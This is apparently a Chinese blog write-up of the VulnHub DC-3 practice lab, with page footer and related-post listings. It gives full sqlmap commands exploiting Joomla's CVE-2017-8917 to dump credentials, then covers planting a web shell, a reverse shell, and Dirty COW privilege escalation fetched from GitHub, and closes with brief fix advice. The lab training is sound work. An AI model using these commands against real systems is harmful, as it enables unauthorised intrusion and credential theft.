Dc3渗透测试

最新推荐文章于 2024-09-05 17:22:26 发布
最新推荐文章于 2024-09-05 17:22:26 发布
阅读量785 收藏 18
点赞数 22
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63523232/article/details/139856592
版权

DC3靶机

配置错误解决

改为IDE 0:0解启动报错

![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/e209cbd6720d4c5fae17b134239b7946.png

信息搜集

在这里插入图片描述

判断192.168.57.224为靶机

在这里插入图片描述

Nmap扫描

在这里插入图片描述

识别到Joomal cms

Nmap漏洞扫描

nmap -T4 -sV -v http://192.168.57.224 -p- --script=auth,vuln

CVE-2017-8917 sql注入漏洞

在这里插入图片描述

Joomscan扫描敏感目录和版本

 joomscan http://192.168.57.224

在这里插入图片描述

复现sql注入漏洞

Sqlmal跑

在这里插入图片描述

sqlmap -u "http://192.168.57.224/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述

爆表

sqlmap -u "http://192.168.57.224/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

在这里插入图片描述

在这里插入图片描述

爆user表字段

sqlmap -u "http://192.168.57.224/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --comuns -p list[fullordering]

在这里插入图片描述

爆用户名和密码

sqlmap -u "http://192.168.57.224/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C username,name,passwd  -p list[fullordering] --dump

在这里插入图片描述

在这里插入图片描述

需要破解hash,用john爆破得到密码snoopy

在这里插入图片描述

扫描出的目录登录

在这里插入图片描述

Templeate下可以创建,上传文件

直接创建木马

在这里插入图片描述

蚁剑连接

在这里插入图片描述

在这里插入图片描述

需要内核提权

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

上传扫描工具

在这里插入图片描述

很多cve

在这里插入图片描述

修改木马反弹shell给kali

在这里插入图片描述

在这里插入图片描述

使用CVE-2016-5195

得到shell后获取交互式shell

Script /dev/null

然后运行

git clone https://github.com/gbonacini/CVE-2016-5195.git
cd CVE-2016-5195
make
./dcow -s

提权成功

在这里插入图片描述

得到了flag

在这里插入图片描述
*sql注入**漏洞*

CVE-2017-8917

Joomla是一个基于PHP的内容管理系统(CMS),广泛应用于各类网站。2017年,Joomla 3.7.0版本被发现存在SQL注入漏洞(CVE-2017-8917),攻击者可以利用该漏洞对数据库进行未授权查询或操作,可能导致数据泄露、篡改甚至删除。

*风险评级*

严重漏洞,可以通过sql注入获取用户密码进入后台

*漏洞详情及修复建议*

*风险评级**High*
漏洞描述: Joomla是一个基于PHP的内容管理系统(CMS),广泛应用于各类网站。2017年,Joomla 3.7.0版本被发现存在SQL注入漏洞(CVE-2017-8917),攻击者可以利用该漏洞对数据库进行未授权查询或操作,可能导致数据泄露、篡改甚至删除。
漏洞影响:sql信息泄露
修复建议:及时升级版本

内核提权

脏牛提权利用—

*风险评级***High*
漏洞描述: ubtun版本低导致内核提权
漏洞影响:获取高权限
修复建议:及时升级操作系统版本
一个人的愿望
关注
  • 22
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
Aluxian_的博客
03-23 1万+
Vulnhub靶机DC3渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现:③:SQL注入:④:文件上传:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载:
渗透测试Vulnhub-DC3
TenG的博客
07-09 276
Preface 光怪陆离都经历,山川湖海放心里 本篇为vulnhub系列DC3啦,距DC2这段时间发生了许许多多的事情,有好有坏,都过来了,这几天多了一个特别的人,是幸运吧哈哈哈。哈哈哈哈哈……开始前说点废话,练习过程中也是参考了许多大师傅们写的文章才完成了,在此记录一下,也非常希望师傅们能指正错误。 Process 老方法,先用nmap扫描一下,对师父们来说都是小意思,就不在挂图赘述啦,得到靶机IP以及只开放了80端口,那么直接访问web服务 可以看到直接就是登录页面,我是先用dirsearch扫描
DC-3靶机渗透测试详细教程
啊醒的博客
05-04 2114
DC-3靶机渗透测试详细教程
VulnHub DC1靶机渗透测试
weixin_44614631的博客
08-25 988
对VulnHub DC1靶机进行渗透测试。最终,得到了四个flag和一个thefinalflag,共5个flag。有两个问题不是特别清楚,需要再进一步学习。 根据网络上两篇博文学习,总结。如果有版权问题,请联系我进行修改或删除...
DC-1靶机渗透测试
来日可期的博客
08-04 1917
SH文件大多是用于程序开发人员,这些文件都是Bash的应用程序非常重要,因为该应用程序主要使用脚本以及命令将被执行,使这个应用程序的工作。CMS:Drupal是开源CMS之一,Drupal是CMS内容管理系统,并且在世界各地使用,受到高度赞赏,Drupal可以作为开源软件免费使用,就是附带了cms的php开发框架。:/etc/passwd文件,系统用户配置文件,存储了系统中所有用户的基本信息,并且所有用户都可以对此文件执行读(r)操作。命令的选项之一,用于指定要搜索的文件名为 "flag4.txt"。
DC-3靶机渗透测试
读书 买花 长大
04-09 332
DC-3
渗透测试:DC-3靶机
Ciyaso的博客
08-16 489
零、修改网卡 扫不到iP需要修改网卡 打卡DC-3时进入这个界面按e键 然后找到g–root 将其后面的值从ro改成rw signie init=/bin/bash 按下Ctrl键+X键进入命令行 查看当前网卡IP信息 ip a,网卡名ens33 编辑网卡配置文件vim /etc/network/interfaces 重启网卡服务/etc/init.d/networking restart,再看看ip a 发现已有ip 一、扫描获取靶机ip arp-scan -l 192.168.203.1
DC1靶机渗透测试
Huangshanyoumu的博客
04-16 759
Vuln hub 渗透测试实战 Vulnhub是一个开放的安全靶场,我们可以使用它所提供的环境进行渗透测试实战。 DC所有环境下载地址:https://www.vulnhub.com/series/dc,199/ 环境搭建: 1.下载 OVA(Open Virtualization Appliance:开放虚拟化设备)https://www.vulnhub.com/entry/dc-1-1,292/ 2.拖入 VMware 打开,配置相关设置,开启运行 3.打开 Kali Linux 进行渗透 1.探测
渗透测试学习之靶机DC-3
xdbzdgx的博客
11-12 4749
1.下载靶机 本篇文章是DC靶机系列的第三篇,针对的是靶机DC-3,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-3的下载地址为DC: 3.2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 需要说明的是DC-3相较前两个靶机,它只有一个flag,便是最后一个flag,没有多余的提示了。 在VMware加载成功之后显示如下界面: 默.
DC3靶机渗透测试练习
10-05
DC3靶机渗透测试练习 DC3靶机渗透测试练习是网络安全领域中的一个重要实践项目,旨在帮助安全测试人员和渗透测试人员提高自己的技能和经验。本文将详细介绍 DC3靶机渗透测试练习的各个阶段和步骤,以及每个阶段的...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4-Web渗透测试靶机
01-19
【DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8446
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
浅谈网络安全的认识与学习规划
最新发布
qq_201729558
09-05 311
本文主要介绍网络安全认识与学习规划
网络安全】逻辑漏洞:绕过应用程序重要功能
等风来
09-01 243
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
网络安全】服务基础第一阶段——第八节:Windows系统管理基础---- Web服务与虚拟主机
goldfish8848的博客
08-31 1516
万维网WWW是World Wide Web的简称,也称为Web、3W等。WWW是基于客户机/服务器方式的信息发现技术和超文本技术的综合。WWW服务器通过超文本标记语言(HTML)把信息组织称为图文并茂的超文本,利用连接从一个站点跳到另一个站点。这样一来就彻底摆脱了以前查询工具只能按特定路径一步步的查找信息的限制WWW(World Wide Web,万维网)是存储在Internet计算机中数量巨大的文档的集合。这些文档称为页面,它是一种超文本(Hypertext)信息,可以用来描述超媒体。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值